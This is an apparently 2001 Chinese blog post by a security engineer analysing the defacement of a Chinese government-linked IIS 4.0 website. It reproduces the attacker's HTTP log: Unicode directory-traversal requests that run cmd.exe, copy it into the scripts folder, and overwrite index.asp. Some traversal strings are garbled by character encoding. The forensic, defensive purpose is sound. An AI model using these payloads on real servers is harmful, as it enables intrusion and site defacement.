美国黑客是如何袭击中国网站的?

原创 2001年04月23日 01:37:00

  作者:朱小英

  我是安络公司的安全工程师。最近美国黑客因撞机事件对我国一些政府网站发动攻击,来势凶猛,我公司安全紧急响应中心已经接到7、8个这样的案例。

  根据我们对这些案例的入侵过程分析,发现美国黑客并没有采用非常高明的手段,而大多是选择弱者,找那些安全防护措施做得很少的网站进行攻击,其中用到了几个危害很大的安全漏洞,下面的一个例子在我国很多网站上都很常见。希望贵网通过互联网媒体的形式,将类似这样的入侵案例批露出来,引起大家的警觉,并采取实际措施加以防护。希望互联网媒体不仅仅热中于报道攻击事件,也将一些重点放到安全防护上来,这样既有新闻价值,又能对读者提供帮助。谢谢!

  关于www.xxxx.xxx.cn的入侵分析

  一:事件背景

  广东某市C局所属网站www.xxx.com.cn (IP: 61.xxx.xxx.17)于2001年4月期间遭到黑客恶意攻击,造成网站网页被修改。在此情况下,深圳市安络科技有限公司于2001年4月17日受某市S局的委托,前往机房现场取证。

  二:服务器基本情况以及已获取资料该服务器操作系统为Windows Nt Server 4.0,安装有IIS 4.0 ,对外使用FIREWALL屏蔽,只开放WEB服务。我方技术员收集获得MS IIS 4.0 2001年4月13日至 4月17日HTTPLOG 和FTPLOG。

  三:分析

  由于该站受入侵后的直接现象为网页被修改. 并且该站受到PIX FIREWALL防卫,对外只开放80端口,所以初步估计是通过IIS远程漏洞获得系统控制权的,IIS 4.0默认下存在ism.dll,msadcs.dll,unicode等获得网页修改权限的远程漏洞。于是我公司技术人员对该服务器的MS IIS 4.0 2001年8月17日至 4月17日HTTPLOG日志文件进行详细的分析和过滤,得出以下结论:

  入侵者利用unicode漏洞,从而可以使用web端口提交执行命令的请求,修改网站主页。

  注:漏洞详细信息请见: http://www.cnns.net/article/db/822.htm

  被更改的页面如下:

  以下为入侵者的入侵行为记录:

  其中①:入侵者IP ② :日期 ③:时间 ④:使用方法 ⑤:被访问URL

  ⑥服务器返回号

  如果⑥服务器返回号为200则入侵者成功利用unicode漏洞执行了命令。

  ① ② ③ ④ ⑤ ⑥

  152.158.208.65 01-4-17 4:34:19 GET /scripts/..鼆€€€?./winnt/system32/cmd.exe, /c+dir+c: 500

  152.158.208.65 01-4-17 4:34:19 GET /scripts/..?../winnt/system32/cmd.exe, /c+dir+c: 500

  152.158.208.65 01-4-17 4:34:19 GET /scripts/../../winnt/system32/cmd.exe, /c+dir+c: 200

  152.158.208.65 01-4-17 4:34:19 GET /_vti_bin/../../../../../../winnt/system32/cmd.exe, /c+dir+c: 200

  152.158.208.65 01-4-17 4:34:19 GET /scripts/..../winnt/system32/cmd.exe, /c+dir+c: 200

  152.158.208.65 01-4-17 4:34:21 GET /scripts/..../winnt/system32/cmd.exe, /c+dir+c: 200

  152.158.208.65 01-4-17 4:34:21 GET /scripts/../../winnt/system32/cmd.exe, /c+dir+c: 200

  152.158.208.65 01-4-17 4:34:21 GET /scripts/../../winnt/system32/cmd.exe, /c+dir+c: 200

  152.158.208.65 01-4-17 4:34:21 GET /_vti_bin/../../winnt/system32/cmd.exe, /c+dir+c: 200

  152.158.208.65 01-4-17 4:34:23 GET /scripts/..../winnt/system32/cmd.exe, /c+dir+c: 200

  152.158.208.65 01-4-17 4:34:23 GET /scripts/../../winnt/system32/cmd.exe, /c+dir+c: 200

  152.158.208.65 01-4-17 4:34:23 GET /scripts/..饊€?./winnt/system32/cmd.exe, /c+dir+c: 500

  152.158.208.65 01-4-17 4:34:23 GET /msadc/../../../../../../winnt/system32/cmd.exe, /c+dir+c: 200

  152.158.208.65 01-4-17 4:34:25 GET /scripts/..o../winnt/system32/cmd.exe, /c+dir+c: 404

  152.158.208.65 01-4-17 4:34:25 GET /scripts/..?../..?../mssql7/install/pubtext.bat"+&+dir+c: 403

  152.158.208.65 01-4-17 4:34:25 GET /scripts/..鴢€€?./winnt/system32/cmd.exe, /c+dir+c: 500

  152.158.208.65 01-4-17 4:34:25 GET /鄝?./winnt/system32/cmd.exe, /c+dir+c: 404

  152.158.208.65 01-4-17 5:21:17 GET /scripts/..../winnt/system32/cmd.exe, /c+set 502

  152.158.208.65 01-4-17 5:21:37 GET /scripts/..../winnt/system32/cmd.exe,

  /c+copy+c:winntsystem32cmd.exe+c:Inetpubscripts1.exe 502

  152.158.208.65 01-4-17 5:24:32 GET /scripts/..../Inetpub/scripts/1.exe, /c+dir+c: 200

  152.158.208.65 01-4-17 5:24:38 GET /scripts/..../Inetpub/scripts/1.exe, /c+set 502

  152.158.208.65 01-4-17 5:24:49 GET /scripts/..../Inetpub/scripts/1.exe,

  /c+dir+C:InetPubwwwrootfastinfo 200

  152.158.208.65 01-4-17 5:25:10 GET /scripts/..../Inetpub/scripts/1.exe,

  /c+echo+rty>C:InetPubwwwrootfastinfoindex.asp 502

  152.158.208.65 01-4-17 5:25:19 GET /index.asp 200

  152.158.208.65 01-4-17 5:25:37 GET /scripts/..../Inetpub/scripts/1.exe, 502

  

  /c+echo+^^^join+us:+poizonb0x@linuxmail.org^^^^^^^^^^^^^^^^^^^^^^[SecurityNewsPortal.com]^^^^^^^^^>C:InetPubwwwrootfastinf

  oindex.asp 502

  152.158.208.65 01-4-17 5:25:43 GET /index.asp 200

  从以上分析我们可以清楚的看到在2001年4月17日来自同一IP的入侵者试图使用unicode漏洞远程执行命令,达到修改网页的目的。

  攻击时间为: 2001年4月17日4:34:19-2001年4月17日5:25:43

  入侵者IP地址为: 152.158.208.65 来自于美国

  四:结论

  入侵者是利用Unicode远程漏洞获得系统控制权,多次远程执行命令,了解服务器结构后,修改网站主页。

  锁定IP为: 152.158.208.65 来自于美国

  攻击时间为: 2001年4月17日4:34:19-2001年4月17日5:25:43

  入侵者物理地址为美国

千万不要攻击中国网站!传奇美国黑客凯文·米特尼克的警告

千万不要攻击中国网站!传奇美国黑客凯文·米特尼克的警告美国顶级黑客都害怕中国互联网   传奇美国黑客凯文·米特尼克近日在其博客上发表文章说:不要攻击中国大陆网站! 并以亲身经历说明原因   ...
  • virusplayer
  • virusplayer
  • 2007年11月09日 10:35
  • 1964

[转]“中国黑客”攻击美军网站真相

美国一研究机构日前无端攻击说,中国可能指使黑客对美国军方网站进行了有组织的攻击。中国外交部发言人秦刚12月13日对此回应说,中国政府一贯禁止任何破坏计算机信息网络的行为,任何单位和个人不得利用互联网从...
  • shenyisyn
  • shenyisyn
  • 2005年12月18日 18:22
  • 2681

世界黑客目前状况排名和世界第一黑客

世界黑客目前状况排名以色列黑客数目已世界称王,香港名列第二据美国安全公司Riptech公布的一项调查研究,2002年上半年,以色列电脑黑客袭击网络使用者的次数在世界上排名第一。研究发现,每1万个以色列...
  • hejianhua
  • hejianhua
  • 2006年05月03日 01:58
  • 35887

黑客大事件-美国国安局NSA被黑,大部分黑客工具被曝光

今天在朋友圈看到有人分享了一条消息,称美国国安局被一个神秘的黑客组织黑了。 其内部的大部分黑客工具被窃取, 并被曝光在网上。 这是去年hacking team 被黑之后, 黑客界的又一重大新闻。网络新...
  • hackstoic
  • hackstoic
  • 2016年08月16日 22:20
  • 3192

国内68个著名的黑客网站_a 匪----独孤一吻

导读: 北京网中行网络技术有限公司提供过滤软件、反黄软件、监控软件,控制不良信息。应用软件开发销售,系统集成及维护,大中型网站设计与开发,并对信息安全进行全面的技术支持。www.infosec.go...
  • chief1985
  • chief1985
  • 2008年05月18日 19:44
  • 3506

中国黑客顶级名单

中国顶级黑客名单 排名不分先后。 什么是黑客?只会使用工具来入侵的徒泻诳停? 下面这些才是黑客! 网名:KING 联系方法:KING@cnhacker.comQQ:2689066360 原...
  • com2689066360
  • com2689066360
  • 2016年08月08日 05:01
  • 1009

中国十大最具影响力黑客

  终生贡献人物  1.网名:goodwell  所属组织;绿色兵团  网站:www.isbase.com  介绍:中国最早黑客组织绿色兵团的创始人,中国黑客界泰斗级元老。  入选理由:作为中国黑客界...
  • yjz0065
  • yjz0065
  • 2006年01月17日 10:10
  • 3083

中国第一代黑客代表人物档案

中国第一代黑客代表人物档案我 国最早一批黑客大约出现在1994年,其黑客行为持续到1999年底。代表性的组织就是GOODWELL(龚蔚)等五人组织的绿色兵团。据称,极盛时期注 册会员达到3000多人,...
  • lxslove
  • lxslove
  • 2008年05月01日 14:52
  • 4071

简评黑客利器——中国菜刀

这篇文章是一个朋友写的,但是他不让说他是谁,就替他保密一下了。这篇文章看起来很像软文,但是文章中介绍的还挺详细,不要把他当成软文来读就行了。 作者:XXX 我是一个玩黑很多年的人,入侵了大...
  • xysoul
  • xysoul
  • 2015年03月17日 14:02
  • 1373

中国与美国在各领域的对比

中国虽落后与美国,但真的如洋奴们所说落后达百年之久,惨不忍睹,一无是处吗?   事实是:美国确实比中国强大,科技社会文化和经济是比中国领先。但没有媚美自由派喧染的那么大。   美国的强大富有原因有...
  • wzebinbin
  • wzebinbin
  • 2017年04月08日 13:39
  • 1429
内容举报
返回顶部
收藏助手
不良信息举报
您举报文章:美国黑客是如何袭击中国网站的?
举报原因:
原因补充:

(最多只允许输入30个字)